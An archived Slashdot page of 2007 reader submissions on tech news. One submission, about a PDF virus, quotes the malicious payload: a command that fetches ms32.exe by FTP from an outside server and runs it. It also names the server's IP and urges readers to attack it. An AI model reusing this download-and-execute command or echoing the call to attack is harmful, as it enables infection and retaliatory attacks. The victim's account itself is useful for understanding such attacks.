Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
Check out the new SourceForge HTML5 internet speed test! No Flash necessary and runs on all devices. ×
Programming

Submission + - Valve's Steam API uncovered (myg0t.com)

Anonymous User writes: "Programmers from the internet harassment group known as "myg0t" have recently released a source code to the public exposing some sensitive "hidden material" in the Steam.exe and steam_api.dll, this hidden content includes Steam's billing interface, utility interface, client interface, user interface and many login exports from steam.

In the news post it states:
"This is a 100% complete Steam API hooking base written by [myg0t]s0beit. It will allow you access to several well hidden interfaces inside the Steam application and some games as well. Here is a short run-down of the basic interfaces it will allow you to completely hook:

ISteamFriends — the steam friends and community class
ISteamUser — user information on the steam client
ISteamClient — client information
ISteamBilling — steam billing information
ISteamUtils — misc steam utilities

It's important to mention that while this is 100% fully functioning, it is outdated as of the release of TF2; they use several new interfaces inside the game and have moved other interfaces into the Steam application itself or vice-versa. That said, the current updated base will not be released anytime soon if ever, if you can understand this release well enough then this should be a non-issue for you.

We must insist that you use this proof of concept code only for non-harmful, peaceful, education purposes only and that it not be discussed anywhere outside of our news forum. myg0t does not and has never condoned illegal activity of any kind or activities with otherwise malicious intent. This is a learning tool so please use it responsibly, as we have for the last year."

No doubt this is something Valve must take seriously, hopefully they will fix this soon."

The Internet

Submission + - Lawsuit in open-source tuning land (pgmfi.org) 1

David Blundell writes: "I owned and operated the largest online site dedicated to tuning and open-source solutions for engine management — chipping and tuning engine computers, basically. From May 2002 till the beginning of this year. Last year, I received a Cease and Desist notice (which was forwarded to the EFF, who were very helpful) for a matter involving a posting on the forum that was removed within 48 hours of telephonic notification. The company involved was pursuing the matter rather aggressively initially, but I thought the matter had been dropped earlier this year after I sold the site until I was surprised by a lawsuit last week.

If anyone is curious about the details of this mess and how it has been handled up to this point, go check out http://forum.pgmfi.org/viewtopic.php?p=95637 (don't worry — no registration required) — it's probably an hour read, but there is a timeline of events and all legal correspondence exchanged over this mess is available for your viewing pleasure.

I'm trying to spread awareness of this matter because I think it is important for forum operators everywhere to understand the risks involved with companies willing to aggressively protect their IP. Also, I think there are some rather novel (well, at least interesting?) issues here:

-The "software" in question here was a backdoor. An existing product's protocols were used in a manner that the original authors had not intended. A software license agreement forbidding reverse engineering may have been violated in the course of creating the "software." Who should be the target? Hosting provider or author? Limitations? At what point does a product that makes use of reverse-engineered protocols (something like Samba, for instance) become a violation of intellectual property?

-The company suing me presumably are laying claim to the code that the downloader can access as their intellectual property. This code was originally written by Honda, reverse engineered and presumably modified by Hondata, who are suing me. Honda could care less about the matter. Without any patents or copyrights, do Hondata have an intellectual property claim to code that they didn't exclusively write (merely modified) running on hardware they did not design, build or sell?

-What are the limits on the duty of care of a forum hosting provider? Moderator? Mere domain owner?

-Is this a case of a large, established commercial provider using strong-armed legal tactics to manipulate and push around an open-source project (and/or take over it, see demands in link), or were there more legitimate claims?

I'm hoping to receive some answers to these questions from an IP attorney, and I'll be sure to share as things progress.

Thanks for listening."

Patents

Submission + - MPEG LA: "Vizio HDTV success from patent viola

schwit1 writes: A recent article in the Wash Post talked about Vizio's fast rise to the top of HDTV sales. Larry Horn, CEO of MPEG LA claims "that unlike other manufacturers mentioned (Samsung, Philips, Sony and Sharp), Vizio reduces costs in part by failing to pay for a license under patents enabling the core digital compression technology used in all high-definition televisions, including its own.

What's more, it encouraged the unauthorized use of intellectual property, which in this case is readily available to all high-definition television suppliers, including Vizio, on fair, reasonable nondiscriminatory terms."

Is MPEG LA a patent troll? Is Larry upset because Vizio is using someone else's HD technology? If a violation is occuring where's the lawsuit?
Security

Submission + - Device to audit and replay RDP, SSH, and Telnet tr (balabit.com)

eldar40k writes: "I have visited the Systems exhibition this week (Munich, Germany), and came across a device that can transparently control and audit RDP and SSH traffic, store and search the results, and even replay the sessions like a movie. You can even search in the texts displayed by the server or typed by the client, for both RDP and SSH. Trial VMWare version is provided upon request at sales@balabit.com."
United States

Submission + - Bill to Restore Checks on Federal Goverment (jbs.org)

Anonymous writes: "American Freedom Agenda Act of 2007 (H.R. 3835) Introduced
Congressman Ron Paul introduced The American Freedom Agenda Act which would allow Guantanamo detainees to petition for a writ of habeas corpus under section 2241 of title 28, United States Code, it would bar presidential signing statements, bar evidence obtained from torture be used as evidence, protect journalists critical of the federal government, and restore checks and balances to the government."

Worms

Submission + - PDF virus targets Acrobat READER 1

hoggoth writes: The recent outbreak of the 'Peachy' virus showed that PDFs can carry dangerous content. All of the news outlets are repeating Adobe's statement that only the full Acrobat suite can activate the virus, that the free Acrobat Reader is immune. However as a victim of a PDF carried virus I can tell you it's not true. This morning I got an email from a financial services firm I have an account with to an email address I set up just for that financial services firm. This led me to stupidly trust the email that contained a PDF attachment. When I clicked on it a window popped up and went away; very suspicious behavior. So I looked closer at the PDF file and found that it contained a mailto: that put some DOS commandline instructions in a file and executed them, which contacted a server, downloaded an executable, and ran it. The meat of the offending part is this: 14 0 obj7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7&@ftp -s:7 -v -A>nul&@del /q 7&@start ms32.exe&\" \"&\" "con.cmd)/S/URI>> This calls cmd.exe with a long command that turns off your firewall, FTP's into the offending site, downloads a rogue version of ms32.exe, and runs it. The virus installed a number of files to my computer and modified the startup to run them. I *think* I got rid of it all, although one can never be sure today with rootkits and all. I googled all over, and I think this is 'breaking news'. Every outlet is still saying Acrobat Reader is safe. Entities to Hate: The virus server at 203.121.69.116 Financial services institutions that sell your private email address to marketers. Adobe for allowing PDFs to execute cmd.com. Adobe for lying about Acrobat Reader being safe. Microsoft for their entire insecure operating system. Come on, outside data is allowed to run and TURN OFF THE FIREWALL?! Please feel free to pound that FTP server's IP address with all the hate you can muster.
Networking

Submission + - ARRL VS FCC over BPL! (arrl.org)

Brew Bird writes: "From the 'Power Lines are not for Data' department —
This has been going on for years, but it's finally made it to the courts! The ARRL (Ham radio guys for the unknowing) has managed to drag the FCC into court over their 'waiver' that allows noisy BPL operators to pollute the radio spectrum with impunity. Some Broad Band Power Line systems create annoying radio frequency noise that interferes with existing radio gear. The FCC is SUPPOSED to have these systems shut down until they can be repaired, but has been loath to do so. So, After all the proper 'legal' avenues have been exhausted, the FCC has been hauled in front of a judge to explain just why it's 'ok' for the power company to jam radio systems, but no one else can."

Television

Submission + - Why Can't I buy a cablecard ready set top box? (arstechnica.com) 1

Al E Usse writes: "Ars Technica does a write up of the problems that haven't been solved by the July 1, 2007 integration ban on integrated security in your cable box. Three months after the ban went into effect, digging up a third-party, CableCARD-ready set-top box can be an exercise in hair-pulling frustration. The companies who make the boxes don't seem interested in selling to consumers, cable companies still push their own branded devices, and Best Buy employees... well, the less said the better. We've heard the pain of our readers on this issue. One of them described his own epic (and fruitless) quest to secure such a device. His conclusion? "Although I should be able to buy a set-top box of my own, nobody will sell me one. I am standing on the doorstep, wad of cash in hand, yelling, 'Please take my money! I want to buy!' but am turned away."
The Internet

Submission + - Online Poker Room Caught Cheating -Absolute Poker (nytimes.com) 1

gus spangles writes: Absolute Poker, one of the major online poker rooms, has been caught cheating. Allowing some players the ability to see other people's cards. Absolute had issued a public statement denying the claims after an internal investigation but then provided self incriminating evidence to an outside researcher that implicated them beyond any doubts.
Even more shocking is that all early information points to it being an internal job headed possibly by former(current?) owners of the site. Credit to crazymarco, wacokid, n82, snagglepuss, adanthar, and others who have helped in this investigation.
Steven Levitt's nytimes blog writeup of the situation
solid summary of how some of the information was obtained on n82's blog
youtube video of a recreation from the hand history files of one of the instances of cheating in a $1,000 entry online poker tourney on absolute
latest discussion thread on 2+2 where the story was uncovered

Security

Submission + - Student Who Uncovers Breach Escapes Expulsion (pcworld.com)

mikesd81 writes: "PC world reports that a student at Western Oregon University who accidentally discovered a file containing personal data on a publicly accessible university server and then handed that data over to the student newspaper has narrowly escaped being expelled for his actions.

Brian Loving, stumbled upon a file containing the names, Social Security numbers and grade point averages of between 50 to 100 students on a publicly accessible university server in June. Loving downloaded a copy of what he discovered and handed it over to the Western Oregon Journal, the campus newspaper. Though the paper's final publication date for the academic year had already passed, it decided to publish a four-page special report with an article describing Loving's discovery. No names of any of the students were published in the article.

Two months into the investigation, Loving — who is now a staffer with the newspaper — was found to have broken a university computer use policy that prohibits unauthorized people from accessing confidential files that may have been inadvertently placed in a publicly accessible location."

Space

Submission + - ISS Expedition 15 Crew Snap Dramatic Cloud Photos

An anonymous reader writes: From their silent orbit high above planet Earth (via), International Space Station (ISS) astronauts have a unique view and perspective of events on Earth. On 20 August 2007 the Expedition 15 crew aboard ISS witnessed stunning and huge clouds formed over Earth. Five pictures were taken, listed here in time order, giving us the opportunity to share in the spectacular scene: #1, #2, #3, #4, #5, and the via which includes links to larger photos, and links to the original NASA images. And finally, look at this beautiful and interesting cloud pattern over Earth, photographed on 11 August 2007 during Space Shuttle Endeavour's STS-118 mission: #6 (via), #7 (via).
Google

Submission + - Google revoking DRM permissions on bought videos! 1

DoofusOfDeath writes: A few months ago I purchased a great Discovery Channel video from Google's downloadable video service. Sure I can't media-shift it, but I was willing to trade away some fair-use rights so my kids could see the video. I paid cash, they give me the video. End of story, right?

Wrong. Today I got this email (see below). It just goes to show that with DRM, there's little limit to the evil that can be done to you:

Hello,

As a valued Google user, we're contacting you with some important information about the videos you've purchased or rented from Google Video. In an effort to improve all Google services, we will no longer offer the ability to buy or rent videos for download from Google Video, ending the DTO/DTR (download-to-own/rent) program. This change will be effective August 15, 2007.

To fully account for the video purchases you made before July 18, 2007, we are providing you with a Google Checkout bonus for $20. Your bonus expires in 60 days, and you can use it at the stores listed here: http://www.google.com/checkout/signupwelcome.html. The minimum purchase amount must be equal to or greater than your bonus amount, before shipping and tax.

After August 15, 2007, you will no longer be able to view your purchased or rented videos.

If you have further questions or requests, please do not hesitate to contact us. Thank you for your continued support.

Sincerely,

The Google Video Team

Google Inc.
1600 Amphitheatre Parkway
Mountain View, CA 94043
Oracle

Submission + - Oracle contributes Linux code, expands hardware su

Jaden writes: Oracle expanded the list of hardware compatible with its Linux distribution and added support for Novell's YAST administration tool. The certified six hardware configurations to run Oracle Enterprise Linux. Certified products include those made by Compellent Technologies, Dell, Egenera, EMC, Hewlett-Packard, Pillar Data Systems and Unisys. The company also said it is making a file system tuned for large storage configurations available under an open-source license. Called the Btrfs file system, Oracle made an alpha release available Oracle also said it is releasing an open-source version of the YAST Linux installation and configuration tool for Oracle Enterprise Linux and Red Hat Enterprise Linux under the General Public License.

Slashdot Top Deals

Federal grants are offered for... research into the recreation potential of interplanetary space travel for the culturally disadvantaged.

Working...